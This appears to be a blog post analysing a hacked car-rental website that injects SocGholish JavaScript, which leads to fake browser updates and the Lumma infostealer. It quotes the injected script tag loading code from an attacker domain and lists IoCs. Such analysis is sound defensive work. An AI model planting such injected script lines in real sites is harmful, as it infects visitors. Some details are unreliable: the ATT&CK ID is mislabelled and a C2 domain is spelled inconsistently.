Sometimes the most interesting security discoveries start with the most mundane activities, in this case, someone looking to rent a car in Greece. Let me take you through how a seemingly innocent website search led to the discovery of a SOCGholish malware campaign.

(Quick disclaimer: While I'll walk you through this investigation as thoroughly as possible, my malware analysis skills are still developing. I'll focus on what I've discovered and observed, acknowledging there might be deeper technical aspects that more experienced analysts could uncover. Let's learn together!)

The Initial Alert

It all began with a Command and Control multi-stage incident alert in Microsoft XDR that was successfully blocked by ASR/Network Protection. The user had attempted to connect to hxxps[://]rednosehorse[.]com, a domain that 15/96 security vendors had flagged as malicious on VirusTotal. Browsing to the URL in a sandbox results in a 404 not found. False positive? Let's find out.

Digging into the user's device timeline revealed they were looking for car rentals in Mykonos, Greece, around the same time the user connected to the malicious domain. While the malicious connections were blocked, I had some time on my hands and wanted to investigate this further.

Down the Rabbit Hole

After some more digging in the timeline, I observed the user connecting to the URL hxxps[://]stratosrentals[.]com, at almost the same time the user connected to the malicious domain hxxps[://]rednosehorse[.]com. Opening the rental site in a sandbox initially showed nothing suspicious, just your typical car rental website with a clean interface. But appearances can be deceiving..

The Any.run analysis told a completely different story. The site was triggering multiple threats related to phishing and SOCGholish, with connections to our suspicious C2 domain appearing in the traffic. You can check the full analysis here:

Analysis https://www.stratosrentals.com Malicious activity - Interactive analysis ANY.RUN

A quick verification on sitecheck.sucuri.net confirmed our suspicions, the site was compromised. But why are we not seeing anything strange happening?

The Clever Deception

Here's where it gets interesting. Initial inspection of the site showed nothing unusual, just a normal rental website. However, diving into the source code revealed telling signs of compromise:

<link rel='dns-prefetch' href='//rednosehorse.com' />
<script type="text/javascript" src="https://rednosehorse.com/UAcBfRjO2gnlBsXxFJ9movpnBUaqO5vU-iz9AeVEbOE" id="replacement_equate-js"></script>

SocGholish is known for (browser) fingerprinting, meaning the script likely executes checks before delivering a payload. We have to dive a bit deeper to find the script, we need a specific GET request to find the right redirect:

There is it, the full Javascript in it's glory. It reveals how it creates an iframe over the normal website, when certain conditions are met. This is a massive script, encoded in Base64. But the gist of it is that it checks for certain conditions like:

• Are you using a legitimate browser?

• Is the refferer stratosrentals[.]com in the header?

• Are there cookies present? Has it been visited before?

And likely a lot more, sadly, this is where my malware analysis skills end.

But when all these conditions are met, the user is presented with a malicious webpage. This webpage shows a fake browser update page, and if you click on the button, it downloads a .ZIP file.

SOCGholish, the website hijacker

SOCGholish, also known as FakeUpdates, is a sophisticated malware infection chain that typically begins with compromising legitimate websites. The attackers inject malicious JavaScript code into the website's infrastructure, which allows them to deliver fake update notifications to specific visitors. This technique has been particularly effective because it leverages trusted websites, the victims are visiting real, legitimate sites that have been compromised, the URL bar still shows the website you meant to visit.

The initial compromise often occurs through:

• Exploiting vulnerabilities in CMS (content management systems)

• Vulnerable Wordpress themes/plugins

• Compromised FTP credentials

• Supply chain attacks targeting web hosting providers

  
  

This tactic has been seen in other recent campaigns, like the one targeting Kaiser Permanente employees (detailed in this Malwarebytes blog post). What makes SOCGholish particularly dangerous is its ability to serve as an initial access point for various types of malware, from infostealers to ransomware.

Following the Attack Chain

Curiosity got the better of me, so I followed the rabbit hole. The site attempted to deliver a ZIP file containing multiple DLL files and an Updater.exe. Upon deeper analysis in Any.run, the true nature of this malware became clear. We are dealing with a Lumma Infostealer according to Any.run.

You can see the detailed analysis here: Analysis Browser_1_60_3.zip (MD5: EE7D44052182FE031B1300375F457EF6) Malicious activity - Interactive analysis ANY.RUN

Understanding Lumma Stealer

Lumma Stealer is an information-stealing malware that emerged in late 2022. It's designed to harvest sensitive data including:

• Passwords and cookies from web browsers

• Cryptocurrency wallet information

• Steam and Discord tokens

• Email credentials

• File Transfer Protocol (FTP) credentials

  
  

What makes Lumma particularly concerning is its availability as Malware-as-a-Service (MaaS). Cybercriminals can purchase subscriptions to this malware for as little as a few hundred dollars per month, making it accessible to script kiddies. The malware is regularly updated with new features and improved evasion techniques, as well as a variety in sorts, even fileless.

Diving deeper; executing Updater.exe

I opened the .ZIP in the sandbox and ran Updater.exe. The malware employs sophisticated process injection techniques, a method used to hide malicious code within legitimate Windows processes. In this case, it targets aspnet_wp.exe, a legitimate Windows process used for ASP.NET applications. The analysis revealed multiple "Domain Observed Used for C2 Detected" events, with the compromised process attempting to communicate with guardedscape[.]com.

What makes this particularly sneaky is the choice of aspnet_wp.exe as the injection target:

• It's a legitimate Windows process that normally wouldn't raise suspicions

• It typically has network access as part of its normal operations

• It runs with sufficient privileges to access sensitive data

  
  

The analysis confirmed this was indeed a Lumma Infostealer variant, flagging technique T1055.003 which specifically relates to credential theft from web browsers. This shows how modern infostealers don't just run as obvious malicious processes, they hide within legitimate system processes to evade detection.

The Good News and Lessons Learned

Fortunately, this user never got to the malicious portion of the site, and the initial connection was blocked. However, this investigation reveals how sophisticated modern malware delivery systems have become. What looks like a legitimate business website can be compromised to deliver ransomware and other threats through seemingly innocent update prompts.

Prevention with Microsoft XDR

This particular attack was successfully blocked thanks to two key security controls in Microsoft XDR:

1. Network Protection: This feature blocked the initial connection to the malicious domain (rednosehorse[.]com), preventing the SOCGholish JavaScript from loading in the first place.

   
   

2. Attack Surface Reduction (ASR) Rules: These rules help prevent:

   • JavaScript and VBScript from downloading payload content

   • Malicious code injection into legitimate processes

   • Credential theft attempts

     
     

These controls can effectively break the attack chain at multiple points:

• Blocking the initial malicious domain connection

• Preventing the download of the fake browser update

• Stopping process injection attempts into aspnet_wp.exe

  
  

This highlights the importance of properly configured security controls, they can stop attack chains before they have a chance to execute.

Indicators of Compromise (IoC's)

For fellow security researchers, here are the IoCs discovered during this investigation:

Domains:

• hxxps[://]stratosrentals[.]com (Hacked website)

• rednosehorse[.]com

• hxxps[://]rednosehorse[.]com/UAcBfRjO2gnlBsXxFJ9movpnBUaqO5vU-iz9AeVEbOE

• virtual[.]urban-orthodontics[.]com

• minlliving[.]biz

• guardeduppe[.]com

Script:

• deski[.]fastcloudcdn.com/w_c_09eaffc4740d5a5150b94660ab875ee3[.]js

  
  

Files:

• Browser_1_60_3.zip (2feb50c23b24f494df72b6b9bd6f27c2b857dbd0466ed377312e6c83e8777085)

  
  

IP Addresses:

• 176.53.147.97

• 185.76.79.50

  
  

While this particular incident was benign thanks to our security controls, in particular Microsoft XDR's ASR rules and Network Protection, it provided valuable intelligence about current attack methodologies and a solid set of IoCs to help protect against similar threats.

I hope this blog helps understand the attack path of some malware and was useful to you,. If you made it to end, thanks for reading and till next time!